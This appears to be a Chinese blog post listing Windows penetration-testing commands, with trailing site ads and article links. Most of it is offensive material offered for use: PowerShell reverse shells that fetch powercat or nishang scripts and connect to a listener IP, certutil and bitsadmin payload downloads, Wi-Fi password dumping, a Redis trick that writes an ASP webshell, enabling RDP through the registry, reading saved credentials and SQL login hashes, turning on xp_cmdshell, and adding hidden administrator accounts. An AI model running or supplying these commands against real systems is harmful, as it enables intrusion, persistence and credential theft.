windows实战常用命令
jar 解压jar包
jar -xvf xxx.jar : 默认解压到当前目录
powershell调用curl
powershell -c curl http://www.baidu.com -UseBasicParsing
windows编为base64
certutil -encode a.txt encode.txt
certutil -decode encode.txt a.txt
windows输出散列值
certutil -hashfile 文件名 sha1/sha256/...
windows 特殊符号转义
利用`进行转义
windows 下载文件
certutil -urlcache -split -f http://example.com/a.txt
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\ phpstudy_pro\\ WWW\\ b.ps1"
powershell ( new-object Net.WebClient) .DownloadFile( 'http://192.168.203.140/a.ps1' ,'E:\phpstudy_pro\WWW\a.ps1' )
windows反弹shell
powershell IEX ( New-Object System. Net. Webclient) . DownloadString( 'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' ) ; powercat - c 192. 168. 1. 4 - p 9999 - e cmd
powershell IEX ( New-Object Net. WebClient) . DownloadString( 'https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1' ) ; Invoke-PowerShellTcp - Reverse - IPAddress 192. 168. 203. 140 - port 6666
powershell - NoP - NonI - W Hidden - Exec Bypass - Command New-Object System. Net. Sockets. TCPClient( "127.0.0.1" , 8081) ; $stream = $client . GetStream( ) ; [byte[]] $bytes = 0. . 65535| % { 0} ; while ( ( $i = $stream . Read( $bytes , 0, $bytes . Length) ) -ne 0) { ; $data = ( New-Object - TypeName System. Text. ASCIIEncoding) . GetString( $bytes , 0, $i ) ; $sendback = ( iex $data 2>&1 | Out-String ) ; $sendback2 = $sendback + "PS " + ( pwd ) . Path + "> " ; $sendbyte = ( [text.encoding] ::ASCII) . GetBytes( $sendback2 ) ; $stream . Write ( $sendbyte , 0, $sendbyte . Length) ; $stream . Flush( ) } ; $client . Close( )
系统错误代码
certutil -error 错误代码
获取wife密码信息
netsh wlan show profiles
netsh wlan show profiles name = "Aaron" key = clear
for /f "skip=9 tokens=1,2 delims=:" %i in ( 'netsh wlan show profiles' ) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key = clear
windows中的压缩/解压命令
makecab e:/test.txt e:/test.zip
expand e:/test.zip e:/test.txt
expand -F:* test.zip E:\ output\
windowsw全局搜索文件
for /r c:/ %i in ( *flag*) do @echo %i
dir C:\ /b/s "flag"
redis写入文件
config get dir
config set dir /var/www/
set aa "\n\n\n<%execute request('chopper')%>\n\n\n"
config get dbfilename
config set dbfilename aa.asp
save
注册表开启3389
REG ADD HKLM\ SYSTEM\ CurrentControlSet\ Control\ Terminal" " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName = '%COMPUTERNAME%' call SetAllowTSConnections 1
REG ADD HKLM\ SYSTEM\ CurrentControlSet\ Control\ Terminal" " Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\r dpwd\Tds" /s
查询保存的登陆凭据
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
cmdkey /l
MSSQL命令执行
EXEC sp_configure 'show advanced options' , 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell' , 1
GO
RECONFIGURE
GO
exec xp_cmdshell 'whoami'
MSSQL数据查询
select user,@@version
select * from master.dbo.sysdatabases
select b.name tablename
from sys.objects b where b.type = 'u' order by b.name
SELECT * FROM INFORMATION_SCHEMA.columns WHERE TABLE_NAME = 'C_STUDYPROJECT'
select name,password from syslogins
Select master.dbo.fn_varbintohexstr( password_hash) from sys.sql_logins where name = 'sa'
mshta 命令
mshta在一般的应用中都不需要什么特别的参数,如:
mshta C:\ test.hta
mshta "%cd%\t est.html"
mshta http://www.google.com.hk
mshta about:blank
mshta vbscript:alert( "hello" ) ( window.close)
mshta vbscript:window.execScript( "alert('hello world!');" ,"javascript" )
mshta javascript:window.execScript( "msgBox('hello world!'):window.close" ,"vbs" )
mshta vbscript:msgbox( "是否确定?" ,36,"确认" ) ( window.close)
mshta javascript:alert( 'hello' ) ; window.close( ) ;
mshta vbscript:CreateObject( "Shell.Application" ) .MinimizeAll( ) ( close)
windwos激活guest
net user Guest /active:yes
net localgroup administrators Guest /add
net user Guest Guest123
net user 用户名 密码 /add
net localgroup administrators 用户名 /add
net localgroup "Remote Desktop Users" 用户名 /add
net user 用户名 /passwordchg:yes
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)